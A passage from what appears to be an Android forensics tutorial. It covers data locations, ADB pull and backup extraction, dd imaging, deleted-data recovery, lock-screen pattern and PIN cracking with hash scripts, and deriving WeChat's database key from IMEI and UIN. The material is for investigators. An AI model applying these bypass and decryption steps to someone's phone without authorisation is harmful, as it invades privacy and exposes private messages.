binaries, and other system-related files. The pre-installed applications
that come along with the phone are also present in this partition. The
following screenshot shows the files present in the system partition on
an Android device:<strong><br />
</strong></li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn19.png" /></div>
Here are some of the interesting files and folders present in the
/system partition that are of interest to a forensic investigator –<br />
<strong>build.prop<br />
</strong><br />
This file contains all the build properties and settings for a given
device. For a forensic analyst, this file gives an overview of the
device model, manufacturer, Android version, and many other details.
Contents of this file can be viewed by issuing a cat command, as shown
in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn20.png" /></div>
As shown in the preceding output, you can find out the product model,
CPU details, and Android version by viewing this file content. On a
rooted device, tweaking the build.prop file could lead to a change in
several system settings.<br />
<strong>app<br />
</strong><br />
This folder contains system apps and preinstalled apps. This is
mounted as read only to prevent any changes. The following screenshot
shows various system-related apps that are present in this folder:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn21.png" /></div>
Along with the APK files, you might have also noticed .odex files in
the preceding output. In Android, applications come in packages, with
the .apk extension. These APKs contain .odex files whose supposed
function is to save space. The .odex files are a collection of certain
parts of an application that are optimized before booting.<br />
<strong>framework<br />
</strong><br />
This folder contains the sources for the Android framework. In this
partition, you can find the implementation of key services, such as the
system server with the package and activity managers. A lot of the
mapping between the Java application APIs and the native libraries is
also done here.<br />
<strong>ueventd.goldfish.rc and ueventd.rc<br />
</strong><br />
These files contain configuration rules for the /dev directory.<br />
<strong>Application Data Storage – </strong>Android devices store a
lot of sensitive data through the use of apps. Here is a more detailed
split of various sources of Data on Android –<br />
<ol>
<li>Apps that come along with Android</li>
<li>Apps installed by the manufacturer</li>
<li>Apps installed by a wireless carrier</li>
<li>Apps installed by the user</li>
</ol>
All of these store different types of data on the device. Application
data often contains a wealth of information that is relevant to the
investigation. Here is a sample list of possible data that can be found
on an Android device:<br />
<ul>
<li>SMS</li>
<li>MMS</li>
<li>Chat messages</li>
<li>Backups</li>
<li>E-mails</li>
<li>Call logs</li>
<li>Contacts</li>
<li>Pictures</li>
<li>Videos</li>
<li>Browser history</li>
<li>GPS data.</li>
<li>Files or documents downloaded</li>
<li>Data that belongs to installed apps (Facebook, Twitter, and other social media apps)</li>
<li>Calendar appointments</li>
</ul>
Data belonging to different applications can be stored either
internally or externally. In the case of external storage (SD card),
data can be stored in any location. However, in the case of internal
storage, the location is predefined. To be more specific, internal data
of all the apps present on the device (either system apps or
user-installed apps) is automatically saved in the /data/data
subdirectory, named after the package name. For example, the default
Android email app has a package named com.android.email, and the
internal data is stored in /data/data/com.android.email.<br />
Android provides developers with certain options to store data to the
device. Data that belongs to applications can be stored in one of the
following locations:<br />
<ul>
<li>Shared preferences</li>
<li>Internal storage</li>
<li>External storage</li>
<li>SQLite database</li>
<li>Network</li>
</ul>
Let’s understand all these in details.<br />
<strong>Shared Preferences – </strong>Shared Preferences provides a
framework to store key-value pairs of primitive data types in the .xml
format. Primitive data types include Boolean, float, int, long, and
string. Strings are stored in the <strong>Universal Character Set Transformation Format-8 </strong>(<strong>UTF-8</strong>) format. These files are typically stored in the application’s /data/data/<package_name>/shared_prefs path.<br />
Screenshot for Shared Preference –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn22.png" /></div>
All the data in the key-value pair is stored in a file. Looking into
the file will help the investigator to obtain sensitive data.<br />
<strong>Internal storage – </strong>The files here are stored in the internal storage. These files are located typically in the application’s<strong> /data/data</strong> subdirectory. Data stored here is private and cannot be accessed by other applications.<strong><br />
</strong><br />
Even the device owner is prevented from viewing the files (unless they have root access).<br />
The following screenshot shows the details of the apps stored with their package name in the /data/data directory:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn23.png" /></div>
Internal data for each of the app is stored in respective folders.
Usually, the databases, lib, shared_pref, cache folders are created for
most of the applications.<br />
Folder description –<br />
shared_prefs – XML file of shared preferences contains data in a key-value pair.<br />
lib – Custom library files required by app<br />
files – Developer-saved files<br />
cache – Files cached by app<br />
databases – SQLite and journal files<br />
<strong>External storage – </strong>Files can also be stored by the
apps in external storage. External storage can be a removable media,
such as an SD card or non-removable storage that comes with the phone.
In the case of a removable SD card, data can be used on other devices
just by removing the SD card and inserting it into any other device. SD
cards are usually formatted with the FAT32 filesystem, but other
filesystems, such as EXT3 and EXT4, are also being used increasingly.
Data stored in SD Card are public and can be accessed by other
applications, provided the requesting apps have the necessary
permissions. Large files, such as images and videos, loaded by the apps
are usually stored in the external storage for faster retrieval<br />
<strong>SQLite database – </strong>SQLite is a popular database
format present in many mobile systems. SQLite databases are a rich
source of forensic data. The SQLite files used by the apps are generally
stored at /data/data/<ApplicationPackageName>/databases. From a
forensic point of view, they are highly valuable since they often store a
lot of important data handled by the application. The contents of the
databases folder can be seen in the following screenshot<br />
<strong>Network – </strong>You can use the network to store and retrieve data on your own web-based services. To do network<strong><br />
</strong>operations, the classes in the java.net.* and android.net.* packages can be used. These<strong><br />
</strong>packages provide developers with the low-level APIs that are necessary to interact with the network,<strong><br />
</strong>web servers, and so on.<br />
<h1>
Android filesystem overview</h1>
Understanding the filesystem is very important in Android forensics, as it helps us gain knowledge of<strong><br />
</strong>how the data is stored and retrieved. This knowledge about properties and the structure of a<strong><br />
</strong>filesystem will prove to be useful during forensic analysis.<br />
<strong>Viewing filesystems on an Android device – </strong>The
filesystems supported by the Android kernel can be determined by
checking the contents of the filesystems file that are present in the
proc folder. The content of this file can be viewed using the following
command – <strong>cat /proc/filesystems<br />
</strong><br />
<strong>Common Android filesystems – </strong>The filesystems present in Android can be divided into three main categories, which are as follows:<strong><br />
</strong><br />
<ul>
<li>Flash memory filesystems</li>
<li>Media-based filesystems</li>
<li>Pseudo filesystems</li>
</ul>
<strong>Flash memory filesystems – </strong>Flash memory is a type of
constantly-powered non-volatile memory that can be erased and
reprogrammed in units of memory called blocks. Common flash memory
filesystems are – Extended File Allocation Table (exFAT), Flash Friendly
File System (F2FS ), Journal Flash File System version 2 (JFFS2), Yet
Another Flash File System version 2 (YAFFS2), Robust File System (RFS).<br />
Media-based filesystems – Media-based filesystems supported by
android are – EXTended file system (EXT2/EXT3/EXT4), File Allocation
Table (FAT), Virtual File Allocation Table (VFAT).<br />
<strong>Pseudo filesystems – </strong>Pseudo filesystems can be
thought of as logical groupings of files. Some of the important pseudo
filesystems found on an Android device are – control group (cgroup),
rootfs, procfs, sysfs, tmpfs<br />
One can use the <strong>mount</strong> command to see different partitions and their filesystems available on the Device.<br />
<strong>Extracting Data Logically from Android Devices – </strong>The
term logical extraction means extractions of data that do not recover
deleted data, or do not include a full bit-by-bit copy of the evidence.
Using this method, a forensic examiner cannot be sure whether they have
recovered all of the data possible since the operating system is
choosing which data it allows the examiner to access. In simple word,
logical extraction is analogous to copying and pasting a folder to
extract data from a system. This process will only copy files that the
user can access and see. If any hidden or deleted files are present in
the folder being copied, they will not be in the pasted version of the
folder.<br />
<strong>What kind of data can be recovered – </strong>Almost all kind
of data can be recovered through logical extraction. The bulk of this
data is stored in SQLite databases, so it is even possible to recover
large amounts of deleted data through a logical extraction. When
forensically analyzing an Android device, the limiting factor is whether
forensic investigator has the ability to access all the data on the
android phone i.e. whether the investigator has root access or not.
Since the majority of the data is stored in /data/data folder, if the
forensic investigator does not have root access, he/she won’t be able to
access all the data of the application. In this, we will assume
forensic investigator already has root access to the Android Phone.<br />
<strong>Manual Extraction using ADB – </strong>The “<strong>ADB</strong><br />
<strong>pull”</strong> command can be used to pull single files or
entire directories directly from the device on to the forensic
examiner’s computer. This method is especially useful for small
examinations where the file size is small.<br />
For this method, <strong>USB Debugging </strong>should be enabled on the device. Enabling USB Debugging has been discussed earlier.<br />
<strong>Note</strong> – <strong>before Android 4.2.2, enabling USB
debugging was the only requirement to communicate with the device over
ADB. In Android 4.2.2, Google added Secure USB debugging option. The
Secure USB debugging option adds an additional requirement of selecting
to connect to a computer on the device’s screen; this prevents ADB
access to locked devices from untrusted computers. If Always allow from
this computer is selected, the device will store the computer’s RSA key,
and the prompt will not appear on future connections to that computer,
even if the device is locked</strong>.<br />
Once <strong>USB debugging </strong>has been enabled and the <strong>Secure USB debugging </strong>check
passed (depending on Android version), the device is ready for
examination. To verify that the device is connected and ready to use
ADB, execute the following command: <strong>adb devices</strong><br />
This should list your device. If not, please enable USB Debugging and
install device driver if needed. If everything is running correctly,
the device status should show the name of the device as shown below –<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn24.png" /><br />
<strong>Using ADB shell to determine if a device is rooted – </strong>The simplest method to determine if a device is rooted is to use the “<strong>adb shell</strong>” command. Open a terminal on the local computer and run the command “<strong>adb shell.”</strong><br />
The shell will appear one of two ways, either with $ or #<br />
The # symbol is used to indicate a root user, and the $ symbol
indicates a non-root user. If the shell returns showing #, the shell has
root access. If the shell returns $, try running the command “<strong>su.</strong>”<br />
<strong>Extracting Data using ADB pull – </strong>ADB pull command is used to transfer files from the device to the local workstation. The format for the ADB pull command is –<br />
<strong>adb pull [-a] path_of_file_on_phone path_of_file_on_computer<br />
</strong><br />
The optional -a flag will copy the file’s timestamp and mode<br />
Example – If we run the following command – “<strong>adb pull/data/data/com.android.providers.telephony/databases/mmssms.db C:/sms_data”</strong><br />
This command would pull the SMS database file from the device, and
write it to sms_data directory. The database can now be examined with a
SQL Browser or any other forensic tool.<br />
<strong>ADB backup extractions – </strong>Google implemented ADB
backup functionality, beginning in Android 4.0 Ice Cream Sandwich. This
allows forensic examiners to backup application data to a local computer
over ADB. This process does not require root and is therefore highly
useful for forensic purposes. However, it does not acquire every
application installed on the device. When a developer makes a new app,
it is set to allow backups by default, but this can be changed by the
developer. In practice, it seems the vast majority of developers leave
the default setting, which means that backups do capture most
third-party applications. Unfortunately, most Google applications
disable backups; full application data from apps such as Gmail and
Google Maps will not be included.<br />
The format of the ADB backup command is –<br />
<strong>adb backup [-f <file>] [-apk|-noapk] [-obb|-noobb] [-shared|-noshared] [-all] [-system|-nosystem] [<packages…>]<br />
</strong><br />
Options explanation:<br />
-f: Path for the output file. If not specified, defaults to backup.ab in present working directory.<br />
[-apk|noapk]: Choose whether or not to back up the .apk file. Defaults to -noapk.<br />
[-obb|-noobb]: Choose whether or not to back up .obb (APK expansion) files. Defaults to -noobb.<br />
[-shared|-noshared]: Choose whether or not to back up data from shared storage and the SD card. Defaults to -noshared.<br />
[-all]: Include all applications for which backups are enabled.<br />
[-system|-nosystem]: Choose whether or not to include system applications. Defaults to the -system.<br />
[<packages>]: Explicitly name application packages to be backed up. Not needed if using –all or -shared.<br />
Example – ADB backup command to capture all possible application data would be –<br />
<strong>adb backup –f C:/Users/backup.ab –shared –all<br />
</strong><br />
Example – ADB backup command to capture a specific application’s data would be –<br />
<strong>adb backup –f C:/Users/Facebook.ab com.whatsapp.katana<br />
</strong><br />
You should see something like:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn25.png" /></div>
<span class="pardot-title">Ethical Hacking Training – Resources (InfoSec)</span><br />
When performing a backup, the user must approve the backup on the
device. This means that backups cannot be performed without bypassing
screen locks.<br />
Parsing ADB Backup – The resulting backup data is stored as a .ab
file but is actually a .tar file that has been compressed with the <strong>Deflate </strong>algorithm. If a password were entered on the device when the backup was created, the file would also be AES encrypted.<br />
There are many free utilities to turn the .ab backup file into a .tar
that can be viewed. One such utility is the Android Backup Extractor.<br />
It can be found at <a href="http://sourceforge.net/projects/adbextractor/">http://sourceforge.net/projects/adbextractor/</a><br />
To use the Android Backup Extractor, simply extract its files into
the directory with the backup. The command to run the utility is – <strong>java -jar abe.jar unpack backup.ab backup.tar</strong><br />
If the command runs properly, the command line will display as follows:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn26.png" /></div>
The first line of the output informs the examiner that the file was
not encrypted. Had it been encrypted, the examiner would have to pass
the password as an argument at the end of the command line. The .tar
file will be at the path specified on the command line or the current
working directory if no path is specified. Decompressing the .tar file
may be done manually on a Linux command line or with one of the many
Windows archive utilities, such as WinRAR or 7Zip as shown below<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn27.png" /></div>
Now that the backup has been converted to a .tar file and then
extracted, the examiner can view the data contained in the backup for
forensic investigation.<br />
<h1>
Bypassing Android Lock Screens</h1>
Lock screens are the most challenging aspect of Android forensic
examinations. While there are methods to bypass them, this can be highly
dependent on the OS version, device settings, and capability of the
examiner. Commercial forensics tools such as Cellebrite and XRY have
fairly robust bypass capabilities but are far from infallible.<br />
<strong>Lock screen types – </strong>Various type of lock screen are<br />
<ul>
<li>None/Slide</li>
<li>Pattern</li>
<li>PIN</li>
<li>Password</li>
<li>
<div>
Smart Lock</div>
<ul>
<li>Trusted Face</li>
<li>Trusted Location</li>
<li>Trusted Device</li>
</ul>
</li>
</ul>
<strong>General bypass information – </strong>In all cases, bypassing the lock screen will require retrieving a file from the device.<br />
The files that need to be pulled to crack a PIN/password on devices before Android 4.4 are:<br />
<strong>/data/system/password.key<br />
</strong><br />
<strong>/data/data/com.android.providers.settings/databases/settings.db<br />
</strong><br />
The files that need to be pulled to crack a PIN/password on devices running Android 4.4 and higher are:<br />
<strong>/data/system/password.key<br />
</strong><br />
<strong>/data/system/locksettings.db<br />
</strong><br />
Only one file needs to be pulled to crack a Pattern lock on all versions of Android:<br />
<strong>/data/system/gesture.key<br />
</strong><br />
Many tools exist that will bypass lock screens automatically. We will use Andriller which can be downloaded from – <a href="https://andriller.com/">https://andriller.com/</a><br />
<strong>Cracking an Android pattern lock – </strong>Now we have gesture.key, which contains the pattern lock information, let’s take a look at the file contents:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn28.png" /></div>
The hex contents of the file are an unsalted SHA-1 hash of the swipe
pattern. The simplest method for cracking this hash is a dictionary
attack since there is a limited number of the pattern (4 minimum and 9
maximum). CCL Forensics, based in the UK, provides a free Python script
to create the hash dictionary. It can be downloaded at <a href="http://www.cclgroupltd.com/product/android-pattern-lockscripts/">http://www.cclgroupltd.com/product/android-pattern-lockscripts/</a><br />
The file is GenerateAndroidGestureRainbowTable.py. To run it, Python 3
must be installed on the examiner’s system. Python 3 can be downloaded
at https://www.python.org/downloads/. Many forensics tools provide
Python support or use it themselves, so an examiner may already have it
installed. To execute the file, simply navigate to the directory
containing it and run:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn29.png" /></div>
Once it completes, there should now be a file called
AndroidLockScreenRainbow.sqlite in the same directory as the
GenerateAndroidGestureRainbowTable.py script. Now that we have a
database containing the hash of every possible Android pattern, we
simply need to look up the hash we found in the gesture.Key file. This
can be done manually with an SQLite viewer or even SQL commands.
However, CCL Forensics also provides Android_GestureFinder.py, a script
that will look up the hash in the database created previously. Ensure
that the AndroidLockScreenRainbow.sqlite and gesture.Key files are in
the same directory as Android_GestureFinder.py, and run the following
script:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn30.png" /></div>
The output should return very quickly, as it is performing a simple
lookup in the hash database. The Hash column shows the hash value that
was found, and the Pattern is the corresponding lock screen pattern
which is 0 4 8 7 6.<br />
Another method of doing this is by looking up the hash value in the
hash database. The hash value can be searched over the internet, or it
can be read using DB browser for SQLite.<br />
<strong>Cracking an Android PIN/Password</strong> – To crack the
PIN/Password lock, we’ll need to take a look at the contents of the
files pulled earlier. Password.key is very similar to gesture.key; it
contains a hash of the password as shown in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn31.png" /></div>
CCL Forensics provides a useful Python script for this purpose. Other
cracking tools, such as hashcat, could also be used. The CCL Forensics
PIN/Password tool can be downloaded for free at
http://www.cclgroupltd.com/product/android-pin-password-lock-tool/. Two
files will be downloaded, BruteForceAndroidPin.py and
RecoverAndroidPIN.py. RecoverAndroidPIN.py is for locating the necessary
files within a physical image; we won’t be needing it for our purposes.<br />
The format for BruteForceAndroidPIN.py is:<br />
<strong>python BruteForceAndroidPIN.py <hash> <salt> <max code length (4-16)> t</strong><br />
The t argument on end is used to indicate the hash is a password; it
is not needed for cracking a PIN and would simply increase the time it
takes to run. Here is the sample screenshot –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn32.png" /></div>
The PIN from this example was 2587 as indicated in the output.<br />
<h1>
Extracting Data Physically from Android Devices</h1>
Physical extraction is an exact bit-for-bit image of the electronic
media. It involves removing the evidence drive from the suspect’s
computer and imaging it via a write blocker. The output is frequently
referred to as a <strong>raw image</strong>, or simply a <strong>bin </strong>(binary)
file. To manually image a device, we are going to have to execute
commands on the device from the ADB shell, and these will require root
permissions. If root access cannot be obtained, the SD card can
generally still be imaged.<br />
<strong>Extracting data physically with dd – </strong>dd command is
frequently used in forensics to create bit-by-bit images of entire
drives. The format of the dd command is as follows –<br />
<strong>dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 conv=notrunc, noerror, sync<br />
</strong><br />
Flags Meaning –<br />
<ul>
<li>If: the path of the input file to read from.</li>
<li>of: the path of the output file to write to.</li>
<li>bs: It specifies the block size. It defaults to 512 bytes if not specified.</li>
<li>conv: It specifies the conversion options as its attributes:</li>
<li>notrunc: It does not truncate the output file.</li>
<li>noerror: It continues imaging if an error is encountered.</li>
<li>sync: In conjunction with the noerror option, this option writes
\x00 for blocks with an error. It is important for maintaining file
offsets within the image.</li>
</ul>
<strong>Determine what to Image</strong> – When imaging a computer,
an examiner must first find what the drive is mounted as; /dev/sda, for
example. The first step is to launch the ADB shell and run the cat
/proc/partitions command as shown below –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn33.png" /></div>
mmcblk0 is the entirety of the flash memory on the device. P1-p29 are
the size of the partitions. To obtain a full image of the device’s
internal memory, we would run the dd command with mmcblk0 as the input
file. Most of these partitions are unlikely to be forensically
interesting. To view the corresponding names for each partition, we can
look in the device’s by-name directory. This does <em>not </em>exist on
every device and is sometimes on a different path, but for this device,
it is found at /dev/block/msm_sdcc.1/by-name. By navigating to that
directory and running the ls –al command, we can see to where each block
is symbolically linked as shown in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn34.png" /></div>
If our investigation was only interested in the userdata partition, we now know that it is<br />
mmcblk0p28, and could use that as the input file to the dd command.<br />
If the by-name directory does not exist on the device, it may not be
possible to identify every partition on the device. However, many of
them can still be found by using the mount command within the ADB shell.<br />
<strong>Writing dd output to SD Card</strong> – The output file of
the dd command can be written to the device’s SD card. On newer devices,
the /sdcard partition is actually a symbolic link to /data/media. To
determine where the SD card is symbolically linked to, simply open the
ADB shell and run the ls -al command. If the SD card partition is not
shown, the SD likely needs to be mounted in recovery mode.<br />
After determining which block to read and to where the SD card is
symbolically linked, image the /data partition to the /sdcard, using the
following command –<br />
<strong>dd if=/dev/block/mmcblk0p28 of=/sdcard/data.img bs=512 conv=notrunc, noerror, sync<br />
</strong><br />
The output is shown below –<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn35.png" /><strong><br />
</strong><br />
Now, an image of the /data partition exists on the SD card. It can be
pulled to the examiner’s machine with the ADB pull command or simply
read from the SD card.<br />
<strong>Note – The partitions which we have seen above is Multimedia
Card (MMC) blocks, which is typically seen in newer devices. Very Older
devices more likely consist of Memory Technology Device (MTD) blocks. In
this case, dd command may not work, and we can use the nanddump command
for reading and extracting data from MTD blocks.</strong><br />
<strong>Analysis of Extracted Image – </strong>For Analyzing full
image we can make use of tools such as Cellebrite, XRY, Mobile Phone
Examiner, etc. But these are not free. So, we will have to make use of
the free open source tool. The most popular analysis tool that is the
free and open source is Autopsy.<br />
Autopsy – Autopsy can be downloaded at <a href="http://www.sleuthkit.org/">http://www.sleuthkit.org/</a>.
Once the image has been loaded, expanding the image will show all the
volumes that Autopsy found, as shown in the following screenshot –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn36.png" /></div>
One of the volumes will contain data partition which contains data of
all the application as discussed earlier. As each application is
installed, a directory is created for it, and the forensic investigator
can go through the directories created for each application for
analyzing the data present in it.<br />
<strong>Imaging RAM</strong> – The most common tool for Android RAM acquisition is the <strong>Linux Memory Extractor </strong>(<strong>LiME</strong>),
previously known as DMD. It works only on Linux system only. It isn’t
highly user-friendly as it requires the user to compile it from the
source code. The compilation process must also be done for each specific
version of Android for each device being examined. This is necessary
because it is a kernel module that must be built specifically for each
kernel it will be loaded into.<br />
If usage of Lime is not possible, then <strong>mem </strong>tool can also be used for Imaging RAM. The mem tool can be downloaded at <a href="http://sourceforge.net/projects/androidforensics-mem/files/">http://sourceforge.net/projects/androidforensics-mem/files/</a>. Mem is an executable binary that needs to be pushed to the device.<br />
<strong>Acquiring Android SD cards – </strong>Physically imaging an
SD card is very similar to the physical imaging using dd. We just have
to extract the SDCard partition and analyzing process is same as
discussed above.<br />
<strong>Advance Forensics method using JTAG and Chip-off</strong> –<br />
<strong>JTAG</strong> – It is used to communicate with the processor
through a specialized interface for testing purposes. For forensic
examiners, it also allows them to communicate directly with the
processor and retrieve a full physical image of the flash memory.<br />
JTAG has two advantages –<br />
<ol>
<li>It does not require the device to be powered on and so:</li>
</ol>
<ul style="margin-left: 54pt;">
<li>Can be successful even if the device is damaged</li>
<li>There are no RF-shielding concerns</li>
<li>Does not require root, ADB or USB debugging</li>
</ul>
<ol>
<li>It can be used to recover device PINs/passwords and so:</li>
</ol>
<ul style="margin-left: 54pt;">
<li>Can image the entire flash memory and recover/crack password files</li>
</ul>
Many of the common ones used for mobile forensics can be found at
http://teeltech.com/mobile-device-forensic-tools/jtag-equipment/. The
RIFF box listed on the site is probably the most frequently used for
mobile forensics.<br />
<strong>Chip-off – </strong>Chip-off involves heating the device’s
circuit board until the solder holding the components to the board
melts, and then removing the flash memory chip. The memory chip can then
be read using commercial tools, resulting in a full physical image. The
process of melting the solder (commonly called reflow or rework) is
used to place and remove components from a circuit board, and the
readers used to acquire the memory are used to both read and write to
memory chips, often in bulk quantities.<br />
<h1>
Recovering Deleted Data from Device</h1>
When a user deletes any data from the device, the data is not
actually erased. What gets deleted is the pointer to this data. All
filesystems contain metadata that maintains information about the
hierarchy of files, file names, and so on. Hence, it is possible to
recover the deleted data.<br />
<strong>Recovering data deleted from an SD card – SDCard runs on the </strong>FAT32
filesystem. If the SD card is removable, it can be mounted as a drive
by connecting it to a computer using a card reader. In forensics, to
make sure that the original evidence is not modified, a physical image
of the disk is taken, and all further experimentation is done on the
image itself. Similarly, in the case of SD card analysis, an image of
the SD card needs to be taken. After obtaining the image using tool such
as dd, we can make use of a free tool such as FTK Imager for extracting
the data present in it. The image file has to be imported in FTK
imager, and the data get extracted. This extracted data can be used for
further analysis.<br />
Example – Image shown below contains all the deleted data recovered using FTK Manager<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn37.png" /></div>
<div style="text-align: center;">
<em>Deleted Data from FTK Manager<br />
</em></div>
Apart from this, we can make use of another tool called Scalpel. Once
we have the image of the phone, we can make use of scalpel for
analysis. This tool analyzes the block database storage and identifies
the deleted files and recovers them. Scalpel is filesystem independent
and is known to work on various filesystems including, FAT, NTFS, EXT2,
EXT3, HFS, and so on.<br />
While some pictures are recovered completely, some are not recovered to a full extent, as shown in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn38.png" /><span style="font-size: 18pt;"><br />
</span></div>
<div style="text-align: center;">
Recovered Image using Scalpel</div>
<h1>
Forensic Analysis of Android Applications</h1>
There are many ways an application can store data on the phone. In
app analysis, forensic investigator understands what the app was used
for and find user data.<br />
<strong>Why app analysis – Almost all of them uses s</strong>tandard
phone functions, such as contacts, calls, internet surfing, SMS, etc.
All these activities are done through applications on Android devices.
Second, a person’s app usage can tell you a lot about them: – where
they’ve been, when they were there, who they’ve communicated with, and
even what they may be planning in the future. We will be doing an
analysis of 2 application – WeChat, SMS, and MMS analysis. Also, we have
used Linux in this section.<br />
<strong>WeChat Analysis</strong> – WeChat is a text and voice
messaging service developed in China. The application can be used both
on smartphones such as Android, iPhone, Windows Phone, BlackBerry as
well as on web-based operating systems like Windows and OS X.<br />
The following sections deal with the demo on the extraction of WeChat messages from its default storage database.<br />
<strong>Step 1:<br />
</strong><br />
Use apk2java to <span style="background-color: white;">Decompile Android .apk to Java source code.</span><strong><br />
</strong><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn39.png" /><strong><br />
</strong></div>
<strong>Step 2:<br />
</strong><br />
Using apk2java tool, we get approximate source code of java<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn40.png" /><strong><br />
</strong></div>
<div style="text-align: center;">
<em>Fig: APK extracted using apk2java<br />
</em></div>
<strong>Step 3:<br />
</strong><br />
Extraction of WeChat application<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn41.png" /></div>
<strong>Step 4:<br />
</strong><br />
WeChat does not make use of a database directory. On the contrary,
MicroMag serves to be its equivalent. The directory present in the
MicroMag contains the ‘EnMicroMsg.db.’ database. This database is
encrypted by using SQLCipher. It’s an open source extension that is used
for encrypting the entire database with 256-bit AES encryption.
Nevertheless, the positive aspect about this encryption is that the key
for decrypting the file is present on the device itself.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn42.png" /><span style="background-color: white;"><br />
</span></div>
<span style="background-color: white;">/MicroMsg/<br />
</span><br />
<span style="background-color: white;">CompatibleInfo.cfg<br />
</span><br />
<span style="background-color: white;">/EnMicroMsg.db<br />
</span><br />
<span style="background-color: white;">There are 4 different parameters, which are used to encrypt and decrypt the data stored in EnMicroMsg.db.<br />
</span><br />
PRAGMA key: KEY<br />
This parameter is used for setting the key that needs to be used with the database.<br />
PRAGMA cipher_use_hmac: off<br />
This disables the use of per-page HMAC checks for compatibility with SQLCipher 1.1.<br />
PRAGMA cipher_page_size: 1024<br />
This is used for changing the default size of the page to improve performance.<br />
PRAGMA kdf_iter: 4000<br />
This parameter changes the count of iterations that are used with PBKDF2 key derivation.<br />
<strong>Step 5:<br />
</strong><br />
<span style="background-color: white;">EnMicromsg.db. It’s an encrypted database. As Shown Below:</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn43.png" /></div>
<div style="text-align: center;">
<em>Fig: Encrypt data of EnMicromsg.db<br />
</em></div>
<strong>Step 6:<br />
</strong><br />
The encryption algorithm used in WeChat EnMicromsg.db is a set of MD5
combination of IMEI + WeChat UIN that MD5 value is also known as Pragma
Key.<br />
The pragma key in the first 7 character of MD5 (IMEI + WeChat UIN).<br />
It’s very easy to calculate MD5 for that first figure out the IMEI of the device.<br />
<strong>Step 7:<br />
</strong><br />
<span style="background-color: white;">Dial <strong>*#06#</strong> in your mobile to get your IMEI Number. Take off back cover and battery, and you could see some info including IMEI.<br />
</span><br />
<span style="background-color: white;"><strong>Step 8:<br />
</strong></span><br />
Now, find out the WeChat UIN. UIN is the unique id# of WeChat account. The UIN is inside the file system_config_prfs.xml.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn44.png" /></div>
<div style="text-align: center;">
<em>Fig: system_config_prfs.xml<br />
</em></div>
<div style="text-align: center;">
